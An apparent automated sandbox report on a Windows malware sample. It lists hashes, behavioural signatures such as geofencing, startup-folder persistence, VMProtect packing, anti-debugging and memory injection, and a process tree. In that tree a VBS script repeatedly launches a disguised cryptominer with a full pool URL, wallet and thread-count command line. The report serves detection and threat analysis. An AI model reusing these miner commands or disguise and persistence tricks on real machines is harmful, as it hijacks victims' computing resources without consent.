Analysis
-
max time kernel
149s -
max time network
106s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
20-05-2024 15:54
Static task
static1
Behavioral task
behavioral1
Sample
5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
Resource
win10v2004-20240426-en
General
-
Target
5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe
-
Size
1.6MB
-
MD5
5feee9c9673462dfceb2df85cf8138b5
-
SHA1
18a97e4d1ba48aa7e935e4d0ebf415d7db859c1d
-
SHA256
c8fe094489bbbe929b676647dea128e9ef251d7babe7b6b67ee98d503eb33174
-
SHA512
9f1d6f0bf328fcc930d24dcc9c291b1ca13ef5d742fa0e0f622bfd6890c7da183ee35508e3f4a9b4ddfcbebdeb1e2960d49b00b6a14f28b8198b6e23e5baef1e
-
SSDEEP
49152:Al6wBw10h/e9uUdu7XUIvoMoSzxWTnHGQvPM/9Dft:AlD9WuvtY7pHMD
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe -
Executes dropped EXE 39 IoCs
pid Process 1716 csrs.exe 2016 csrs.exe 936 csrs.exe 2452 csrs.exe 4512 csrs.exe 1944 csrs.exe 1980 csrs.exe 1960 csrs.exe 4540 csrs.exe 1200 csrs.exe 2352 csrs.exe 552 csrs.exe 4316 csrs.exe 5104 csrs.exe 3024 csrs.exe 4448 csrs.exe 3428 csrs.exe 2028 csrs.exe 4528 csrs.exe 4600 csrs.exe 984 csrs.exe 2352 csrs.exe 2576 csrs.exe 424 csrs.exe 3828 csrs.exe 2792 csrs.exe 3412 csrs.exe 3008 csrs.exe 1796 csrs.exe 4560 csrs.exe 3288 csrs.exe 2252 csrs.exe 4684 csrs.exe 960 csrs.exe 3064 csrs.exe 2940 csrs.exe 3840 csrs.exe 932 csrs.exe 4676 csrs.exe -
resource yara_rule behavioral2/files/0x000700000002340d-9.dat vmprotect behavioral2/memory/1716-11-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/1716-12-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/1716-21-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2016-23-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2016-32-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/936-34-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/936-43-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2452-45-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2452-54-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4512-56-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4512-65-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/1944-68-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/1944-76-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/1980-78-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/1980-87-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/1960-89-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/1960-98-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4540-100-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4540-109-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/1200-111-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/1200-120-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2352-122-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2352-131-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/552-133-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/552-142-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4316-144-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4316-153-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/5104-155-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/5104-164-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/3024-166-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/3024-175-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4448-177-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4448-186-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/3428-188-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/3428-197-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2028-199-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2028-208-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4528-210-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4528-219-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4600-221-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4600-230-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/984-232-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/984-241-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2352-243-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2352-252-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2576-254-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2576-263-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/424-265-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/424-274-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/3828-276-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/3828-285-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2792-287-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2792-296-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/3412-298-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/3412-307-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/3008-309-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/3008-318-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/1796-320-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/1796-329-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/4560-331-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/3288-341-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect behavioral2/memory/2252-351-0x00000000004D0000-0x000000000083B000-memory.dmp vmprotect -
Suspicious use of NtSetInformationThreadHideFromDebugger 39 IoCs
pid Process 1716 csrs.exe 2016 csrs.exe 936 csrs.exe 2452 csrs.exe 4512 csrs.exe 1944 csrs.exe 1980 csrs.exe 1960 csrs.exe 4540 csrs.exe 1200 csrs.exe 2352 csrs.exe 552 csrs.exe 4316 csrs.exe 5104 csrs.exe 3024 csrs.exe 4448 csrs.exe 3428 csrs.exe 2028 csrs.exe 4528 csrs.exe 4600 csrs.exe 984 csrs.exe 2352 csrs.exe 2576 csrs.exe 424 csrs.exe 3828 csrs.exe 2792 csrs.exe 3412 csrs.exe 3008 csrs.exe 1796 csrs.exe 4560 csrs.exe 3288 csrs.exe 2252 csrs.exe 4684 csrs.exe 960 csrs.exe 3064 csrs.exe 2940 csrs.exe 3840 csrs.exe 932 csrs.exe 4676 csrs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000_Classes\Local Settings 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2084 wrote to memory of 3044 2084 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe 82 PID 2084 wrote to memory of 3044 2084 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe 82 PID 2084 wrote to memory of 3044 2084 5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe 82 PID 3044 wrote to memory of 1716 3044 WScript.exe 90 PID 3044 wrote to memory of 1716 3044 WScript.exe 90 PID 3044 wrote to memory of 1716 3044 WScript.exe 90 PID 3044 wrote to memory of 2016 3044 WScript.exe 95 PID 3044 wrote to memory of 2016 3044 WScript.exe 95 PID 3044 wrote to memory of 2016 3044 WScript.exe 95 PID 3044 wrote to memory of 936 3044 WScript.exe 99 PID 3044 wrote to memory of 936 3044 WScript.exe 99 PID 3044 wrote to memory of 936 3044 WScript.exe 99 PID 3044 wrote to memory of 2452 3044 WScript.exe 101 PID 3044 wrote to memory of 2452 3044 WScript.exe 101 PID 3044 wrote to memory of 2452 3044 WScript.exe 101 PID 3044 wrote to memory of 4512 3044 WScript.exe 103 PID 3044 wrote to memory of 4512 3044 WScript.exe 103 PID 3044 wrote to memory of 4512 3044 WScript.exe 103 PID 3044 wrote to memory of 1944 3044 WScript.exe 105 PID 3044 wrote to memory of 1944 3044 WScript.exe 105 PID 3044 wrote to memory of 1944 3044 WScript.exe 105 PID 3044 wrote to memory of 1980 3044 WScript.exe 107 PID 3044 wrote to memory of 1980 3044 WScript.exe 107 PID 3044 wrote to memory of 1980 3044 WScript.exe 107 PID 3044 wrote to memory of 1960 3044 WScript.exe 110 PID 3044 wrote to memory of 1960 3044 WScript.exe 110 PID 3044 wrote to memory of 1960 3044 WScript.exe 110 PID 3044 wrote to memory of 4540 3044 WScript.exe 112 PID 3044 wrote to memory of 4540 3044 WScript.exe 112 PID 3044 wrote to memory of 4540 3044 WScript.exe 112 PID 3044 wrote to memory of 1200 3044 WScript.exe 115 PID 3044 wrote to memory of 1200 3044 WScript.exe 115 PID 3044 wrote to memory of 1200 3044 WScript.exe 115 PID 3044 wrote to memory of 2352 3044 WScript.exe 117 PID 3044 wrote to memory of 2352 3044 WScript.exe 117 PID 3044 wrote to memory of 2352 3044 WScript.exe 117 PID 3044 wrote to memory of 552 3044 WScript.exe 119 PID 3044 wrote to memory of 552 3044 WScript.exe 119 PID 3044 wrote to memory of 552 3044 WScript.exe 119 PID 3044 wrote to memory of 4316 3044 WScript.exe 121 PID 3044 wrote to memory of 4316 3044 WScript.exe 121 PID 3044 wrote to memory of 4316 3044 WScript.exe 121 PID 3044 wrote to memory of 5104 3044 WScript.exe 123 PID 3044 wrote to memory of 5104 3044 WScript.exe 123 PID 3044 wrote to memory of 5104 3044 WScript.exe 123 PID 3044 wrote to memory of 3024 3044 WScript.exe 125 PID 3044 wrote to memory of 3024 3044 WScript.exe 125 PID 3044 wrote to memory of 3024 3044 WScript.exe 125 PID 3044 wrote to memory of 4448 3044 WScript.exe 127 PID 3044 wrote to memory of 4448 3044 WScript.exe 127 PID 3044 wrote to memory of 4448 3044 WScript.exe 127 PID 3044 wrote to memory of 3428 3044 WScript.exe 129 PID 3044 wrote to memory of 3428 3044 WScript.exe 129 PID 3044 wrote to memory of 3428 3044 WScript.exe 129 PID 3044 wrote to memory of 2028 3044 WScript.exe 131 PID 3044 wrote to memory of 2028 3044 WScript.exe 131 PID 3044 wrote to memory of 2028 3044 WScript.exe 131 PID 3044 wrote to memory of 4528 3044 WScript.exe 134 PID 3044 wrote to memory of 4528 3044 WScript.exe 134 PID 3044 wrote to memory of 4528 3044 WScript.exe 134 PID 3044 wrote to memory of 4600 3044 WScript.exe 136 PID 3044 wrote to memory of 4600 3044 WScript.exe 136 PID 3044 wrote to memory of 4600 3044 WScript.exe 136 PID 3044 wrote to memory of 984 3044 WScript.exe 138
Processes
-
C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\5feee9c9673462dfceb2df85cf8138b5_JaffaCakes118.exe"1⤵
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1716
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2016
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:936
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2452
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4512
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1944
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1980
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1960
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4540
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1200
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2352
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:552
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4316
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5104
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3024
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4448
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3428
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2028
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4528
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4600
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:984
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2352
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2576
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:424
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3828
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2792
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3412
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3008
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1796
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4560
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3288
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2252
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4684
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:960
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3064
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2940
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3840
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:932
-
-
C:\ProgramData\Windows\csrs.exe"C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 3PXJCtHphXA3KjGdK5hG5g2cE5xNyjmZtY -p x -t 113⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4676
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5e3427d9f439aebefa3d9c299e2a94af3
SHA1ffff4672790378677ec30d3634fc593c10dfd37e
SHA2567374051e75ae97ba687cd153927faccd21fcdcc0b41a42867d38ac62064f6aba
SHA512a9ffc1a3436a26b162b8933f628b6f5014b7cd5678625a479ddf6ad0ff32a50b916c2041265fa0fc6cc99fcf0c63e30eb4811cf8099cc0baf2b718647ce4160b
-
Filesize
1KB
MD5f4b667fe8d75278dffe4fa57d5b7212c
SHA105bc96683ea77d081fedcd810c4de7e9c5bb833a
SHA2564f1a7ce0e5031763d94e774ce4fbe096e9ad0058abb5d209988dbf375a5ec922
SHA51252e2113bf234ea03c933d57030326e850847558ad7b195f74a99fa0d23e9857cb0e273a52a45602663462ee0bd9fee017e76e67b5a68c748e286b36d60ba6d41